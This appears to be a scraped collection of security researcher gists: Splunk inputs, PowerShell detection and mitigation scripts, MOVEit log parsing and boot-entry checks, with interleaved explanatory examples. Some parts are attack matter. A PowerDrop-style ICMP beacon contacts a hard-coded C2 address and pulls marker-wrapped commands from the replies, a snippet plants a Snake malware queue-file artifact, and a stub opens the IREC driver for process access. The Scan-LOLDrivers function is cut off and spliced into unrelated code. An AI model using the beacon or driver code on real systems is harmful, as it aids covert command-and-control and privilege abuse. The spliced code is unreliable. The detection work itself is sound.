Inventory Protocol Handlers

Splunk:

[powershell://LOLProtocolHandlers]
script = Get-Item Registry::HKEY_CLASSES_ROOT\*| Select-Object "Property", "PSChildName"  | ForEach-Object { $_ | ConvertTo-Json; Write-Host "" }
#schedule = 0 0 * * *
schedule = */1 * * * *
sourcetype = PwSh:LOLProtocolHandlers
index = win
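The stanza above dumps every key under HKEY_CLASSES_ROOT, most of which are file-extension and COM class keys rather than protocol handlers. The script below is an added example, not the gist's input script: it keeps only keys that carry a "URL Protocol" value (the marker Windows uses for a registered URI scheme) and resolves the command line each scheme launches from its shell\open\command subkey. The function name Get-ProtocolHandler is this example's own.

```powershell
# Added example: inventory registered URL protocol handlers from HKEY_CLASSES_ROOT.
# A key is a protocol handler when it carries a "URL Protocol" value; the program it
# launches lives in the (Default) value of its shell\open\command subkey.
function Get-ProtocolHandler {
    [CmdletBinding()]
    param()

    Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notmatch '^\.' } |   # skip file-extension keys
        ForEach-Object {
            $key = $_
            # "URL Protocol" is usually an empty string, so test for presence, not content.
            # RegistryKey.GetValue returns the supplied default ($null) when the value is absent.
            if ($null -eq $key.GetValue('URL Protocol', $null)) { return }

            $cmdKey  = "$($key.PSPath)\shell\open\command"
            $command = $null
            if (Test-Path -Path $cmdKey) {
                # Get-ItemProperty exposes the key's default value as the "(default)" property
                $command = (Get-ItemProperty -Path $cmdKey).'(default)'
            }

            [pscustomobject]@{
                Scheme      = $key.PSChildName
                Description = $key.GetValue('', $null)   # the handler key's own default value
                Command     = $command
            }
        }
}

# One compact JSON object per handler, which Splunk parses directly with KV_MODE = json
Get-ProtocolHandler | ForEach-Object { $_ | ConvertTo-Json -Compress }
```

Pasted into the `script =` line (or saved and invoked from it) this produces one event per scheme instead of one per HKCR key, so a search such as `sourcetype=PwSh:LOLProtocolHandlers Command="*powershell*"` or a lookup against a baseline of expected schemes becomes practical. Keys the account cannot open are skipped silently; run the input as an account that can read HKCR if the inventory comes back short.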
MHaggis / Source.cpp
Created August 20, 2023 13:18 — forked from dru1d-foofus/README.md
IREC-PoC
#include <windows.h>
#include <iostream>
#include <dbghelp.h>
#include <TlHelp32.h>
// IOCTL codes for the IREC driver: a fixed base plus a per-operation offset
#define IOCTL_BASE 0x80012008
constexpr DWORD IREC_IOCTL(DWORD x) { return IOCTL_BASE + x; }
#define IOCTL_IREC_OPEN_PROCESS IREC_IOCTL( 0x20 )
static const char* DeviceName = R"(\\.\IREC)";
int main() {
    // Open the driver's device object; this fails unless the IREC driver is loaded
    HANDLE hDevice = CreateFileA(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) { std::cerr << "CreateFileA failed: " << GetLastError() << '\n'; return 1; }
    std::cout << "Opened " << DeviceName << "; OPEN_PROCESS IOCTL = 0x" << std::hex << IOCTL_IREC_OPEN_PROCESS << '\n';
    CloseHandle(hDevice);
    return 0;
}

Organizations that cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. Please note that while these registry settings would mitigate exploitation of this issue, they could affect regular functionality for certain use cases related to these applications.

MS Documentation for the referenced registry settings:

$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION"
$applications = @("Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "PowerPnt.exe", "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe")
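The two variables above are the inputs; the rest of the gist's script is not shown on this page. The following is an added example (not the gist's own code) that applies the mitigation in the form Microsoft's guidance describes, a REG_DWORD value named after each executable with data 1 under the FeatureControl key, and then reads every value back so a machine where the key was created but a value is missing or wrong stands out. The function names Set-CrossProtocolFileNavigationBlock and Test-CrossProtocolFileNavigationBlock are this example's own.

```powershell
# Added example: apply and verify the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION mitigation.
# Each listed application gets a REG_DWORD value named after its executable with data 1.
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION"
$applications = @("Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "PowerPnt.exe", "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe")

function Set-CrossProtocolFileNavigationBlock {
    param([string]$Path, [string[]]$Apps)
    # The key lives under HKLM\SOFTWARE\Policies, so this needs an elevated session
    if (-not (Test-Path -Path $Path)) { $null = New-Item -Path $Path -Force }
    foreach ($app in $Apps) {
        # -Force overwrites an existing value of any type with the DWORD 1
        $null = New-ItemProperty -Path $Path -Name $app -Value 1 -PropertyType DWord -Force
    }
}

function Test-CrossProtocolFileNavigationBlock {
    param([string]$Path, [string[]]$Apps)
    # One row per application: Mitigated is $true only when the value exists and equals 1
    foreach ($app in $Apps) {
        $value = $null
        if (Test-Path -Path $Path) {
            $value = (Get-ItemProperty -Path $Path -Name $app -ErrorAction SilentlyContinue).$app
        }
        [pscustomobject]@{ Application = $app; Value = $value; Mitigated = ($value -eq 1) }
    }
}

Set-CrossProtocolFileNavigationBlock -Path $registryPath -Apps $applications
Test-CrossProtocolFileNavigationBlock -Path $registryPath -Apps $applications | Format-Table -AutoSize
```

The Test function on its own is also a usable compliance check for a fleet (run it through your remote-execution tool and collect the rows). To roll the mitigation back, delete the per-application values with `Remove-ItemProperty -Path $registryPath -Name $app` rather than the whole FeatureControl key, since other feature-control keys may share the parent.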

PowerDropping

My script, PowerDropping, currently accomplishes the following parts of the PowerDrop behavior:

  • It sets a buffer size of 128 bytes, matching the chunk size PowerDrop uses when responses exceed this length.
  • It uses an ICMPClient, which aligns with PowerDrop's use of ICMP Echo Request messages.
  • It includes the use of a hard-coded IP address, similar to PowerDrop's hard-coded IP address for command and control communication.
  • It includes data in the ICMP Echo Request message. While my script uses a test string, PowerDrop uses a UTF16-LE encoded string, often a simple string like "!".
  • It includes a response timeout of 60 seconds, which is the same as PowerDrop's dwell time after sending a beacon.
  • It uses "DRP" and "OCD" as markers, aligning with PowerDrop's use of these strings as prepending and postpending markers in responses.
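To make the six behaviours above concrete, here is an added example of a beacon that implements each of them; it is not the PowerDropping script itself. The C2 address 192.0.2.10 (a documentation range, not a real endpoint), the function names, and the assumption that the "DRP" and "OCD" markers bracket the command text inside the echo reply are this example's own choices where the description above leaves the detail open.

```powershell
# Added example: a PowerDrop-style ICMP beacon exercising the behaviours listed above.
$C2Address  = '192.0.2.10'   # hard-coded, as in PowerDrop; RFC 5737 documentation address for this example
$BufferSize = 128            # fixed chunk size for beacon payloads and responses
$TimeoutMs  = 60000          # 60-second wait for a reply, matching the dwell time above

function New-BeaconPayload {
    param([string]$Text = '!')
    # PowerDrop sends a UTF-16LE string; pad it into the fixed 128-byte buffer
    $buffer = New-Object byte[] $BufferSize
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Text)
    [Array]::Copy($bytes, $buffer, [Math]::Min($bytes.Length, $BufferSize))
    return $buffer
}

function Get-MarkedCommand {
    param([byte[]]$ReplyBytes)
    # Pull out whatever sits between the DRP and OCD markers; a plain echo yields $null
    $text = [System.Text.Encoding]::Unicode.GetString($ReplyBytes).TrimEnd([char]0)
    if ($text -match 'DRP(.*?)OCD') { return $matches[1] }
    return $null
}

function Send-Beacon {
    # System.Net.NetworkInformation.Ping sends an ICMP Echo Request carrying our buffer
    $ping  = New-Object System.Net.NetworkInformation.Ping
    $reply = $ping.Send($C2Address, $TimeoutMs, (New-BeaconPayload))
    if ($reply.Status -ne [System.Net.NetworkInformation.IPStatus]::Success) {
        return [pscustomobject]@{ Status = $reply.Status; Command = $null }
    }
    [pscustomobject]@{ Status = $reply.Status; Command = (Get-MarkedCommand -ReplyBytes $reply.Buffer) }
}

Send-Beacon
```

This generates real ICMP traffic, so point it only at a host you control. Against an ordinary host the reply simply echoes the 128-byte payload and Command is $null; a lab responder that answers with a DRP...OCD-wrapped string is what turns it into a detection test for the network side (ICMP echo requests with 128-byte payloads at a 60-second cadence, and replies whose payload differs from the request).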

Ref: https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/

Rapid7 incident response consultants have identified a method to determine what was exfiltrated from compromised MOVEit customer environments. MOVEit writes its own Windows EVTX file, which is located at C:\Windows\System32\winevt\Logs\MOVEit.evtx. The MOVEit event logs contain a single event ID (Event ID 0) that provides a plethora of information, including the following:

  • File name
  • File path
  • File size
  • IP address
  • Username that performed download
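An added example (not from the Rapid7 post) of reading those records with Get-WinEvent. The message layout of Event ID 0 is not documented on this page, so the parser only extracts IPv4 addresses from the free-text Message and keeps the full text next to them; extend the regex once you have a record in front of you. The function name, the case path and the suspect address are this example's own.

```powershell
# Added example: pull MOVEit Event ID 0 records and surface the IP addresses they carry.
function Get-MoveItDownloadEvent {
    param(
        [string]$LogPath = "$env:windir\System32\winevt\Logs\MOVEit.evtx",
        [string[]]$SuspectIPs = @()   # optional IOC list; an empty list returns every record
    )
    $ipRegex = '\b(?:\d{1,3}\.){3}\d{1,3}\b'
    # FilterHashtable with Path reads the .evtx file directly, so this works on a copied log
    Get-WinEvent -FilterHashtable @{ Path = $LogPath; Id = 0 } |
        ForEach-Object {
            $ips = [regex]::Matches($_.Message, $ipRegex) | ForEach-Object { $_.Value } | Select-Object -Unique
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                IPAddresses = @($ips)
                Message     = $_.Message
            }
        } |
        Where-Object { $SuspectIPs.Count -eq 0 -or ($_.IPAddresses | Where-Object { $SuspectIPs -contains $_ }) }
}

# Work from a copy of the log taken off the host so analysis never touches the live file
Get-MoveItDownloadEvent -LogPath 'C:\cases\moveit\MOVEit.evtx' -SuspectIPs @('198.51.100.7') |
    Format-List TimeCreated, IPAddresses, Message
```

Because the file name, path, size and username are in the same Message text, a `Select-String` or a second regex over the Message property gives the exfiltration list once the field layout is known; grouping the output by IPAddresses is the quickest way to separate the attacker's downloads from routine customer transfers.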
MHaggis / Scan-LOLDrivers.ps1
Created May 19, 2023 16:29
It works, but use with caution :) It's a bit noisy and I think it's broken.
function Scan-LOLDrivers {
    param(
        [Parameter(Mandatory=$true)]
        [string]$path
    )
    Add-Type -TypeDefinition @"
using System;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;

# Define the typical path of the Snake Queue File
$filePath = "$env:windir\registration\"
# Create the folder if it doesn't exist
$null = New-Item -Path $filePath -ItemType Directory -Force
# Generate a random GUID
$guid = [guid]::NewGuid().ToString()
# Define the file name using the generated GUID and the regex pattern

To collect Windows-TerminalServices-RemoteConnectionManager/Operational, add the following to an inputs.conf:

We've found that multiline data parses better natively without having to create a props/transforms.

[WinEventLog://Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational]
disabled = False
renderXml = False
index = win
# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://bootloader]
script = (bcdedit /enum /v) -split "-------------------" | % { if ($_ -match "path\s+(.+)") { Write-Output "Path: $($matches[1])" }; if ($_ -match "identifier\s+(.+)") { Write-Output "Identifier: $($matches[1])" }; if ($_ -match "description\s+(.+)") { Write-Output "Description: $($matches[1])" } }
schedule = 0 0 * * *
#schedule = */5 * * * *
sourcetype = PwSh:bootloader
index = win
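The input above forwards the identifier, description and path of every boot entry; the triage is left to a search. The script below is an added example (not the gist's input script) that does the same parse locally and flags any entry whose loader path is outside a list of expected Windows loaders. The list of expected paths is this example's assumption, and the bcdedit output is constructed for the example, with only the Windows Boot Manager GUID being the real well-known value; on a host, replace `$sample` with `(bcdedit /enum /v)`.

```powershell
# Added example: parse `bcdedit /enum /v` output and flag unexpected loader paths.
$ExpectedPaths = @(                      # assumption: loaders a stock Windows install uses
    '\EFI\Microsoft\Boot\bootmgfw.efi',
    '\Windows\system32\winload.efi',
    '\Windows\system32\winload.exe',
    '\Windows\system32\winresume.efi',
    '\Windows\system32\winresume.exe'
)

function Get-BootEntry {
    param([string[]]$BcdOutput)
    # Entries are separated by a line of dashes; each carries identifier/description/path lines
    $blocks = ($BcdOutput -join "`n") -split '-{10,}'
    foreach ($block in $blocks) {
        if ($block -notmatch 'identifier\s+(\S+)') { continue }   # header text, not an entry
        $entry = [ordered]@{ Identifier = $matches[1]; Description = $null; Path = $null; Suspicious = $false }
        if ($block -match 'description\s+(.+)') { $entry.Description = $matches[1].Trim() }
        if ($block -match 'path\s+(\S+)')       { $entry.Path = $matches[1] }
        # -notcontains is case-insensitive, matching how the boot file system treats paths
        if ($entry.Path -and ($ExpectedPaths -notcontains $entry.Path)) { $entry.Suspicious = $true }
        [pscustomobject]$entry
    }
}

# Constructed sample: a normal boot manager, a normal loader and a tampered loader entry
$sample = @'
Windows Boot Manager
--------------------
identifier              {9dea862c-5cdd-4e70-acc1-f32b344d4795}
device                  partition=\Device\HarddiskVolume1
path                    \EFI\Microsoft\Boot\bootmgfw.efi
description             Windows Boot Manager

Windows Boot Loader
-------------------
identifier              {1b2c3d4e-0000-4000-8000-000000000001}
device                  partition=C:
path                    \Windows\system32\winload.efi
description             Windows 10

Windows Boot Loader
-------------------
identifier              {1b2c3d4e-0000-4000-8000-000000000002}
device                  partition=C:
path                    \Windows\system32\evil.efi
description             Windows 10 (recovery)
'@ -split "`n"

Get-BootEntry -BcdOutput $sample | Format-Table -AutoSize
```

On the sample only the third entry comes back with Suspicious set. A bootkit that replaces winload.efi in place rather than adding an entry will not be caught by a path check alone, so pair this with a hash of the files the paths point at, and treat any new identifier appearing between two daily runs of the Splunk input as worth a look even when its path is on the expected list.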
# Remote host
$remoteHost = "mswin-server.attackrange.local"
# Get query user output from remote host
$queryUserOutput = (quser /SERVER:$remoteHost)
# Parse disconnected sessions: quser leaves SESSIONNAME blank for them, so the remaining
# columns are USERNAME, ID, STATE (Disc), IDLE TIME and LOGON TIME
$disconnectedSessionRegex = '^\s*(\S+)\s+(\d+)\s+.*\s+Disc\s+'
$disconnectedSessions = @($queryUserOutput | Where-Object { $_ -match $disconnectedSessionRegex } | ForEach-Object {
    $null = $_ -match $disconnectedSessionRegex   # refresh $matches for this line
    @{
        UserName  = $matches[1]
        SessionId = [int]$matches[2]
    }
})
# One object per disconnected session
$disconnectedSessions | ForEach-Object { [pscustomobject]$_ }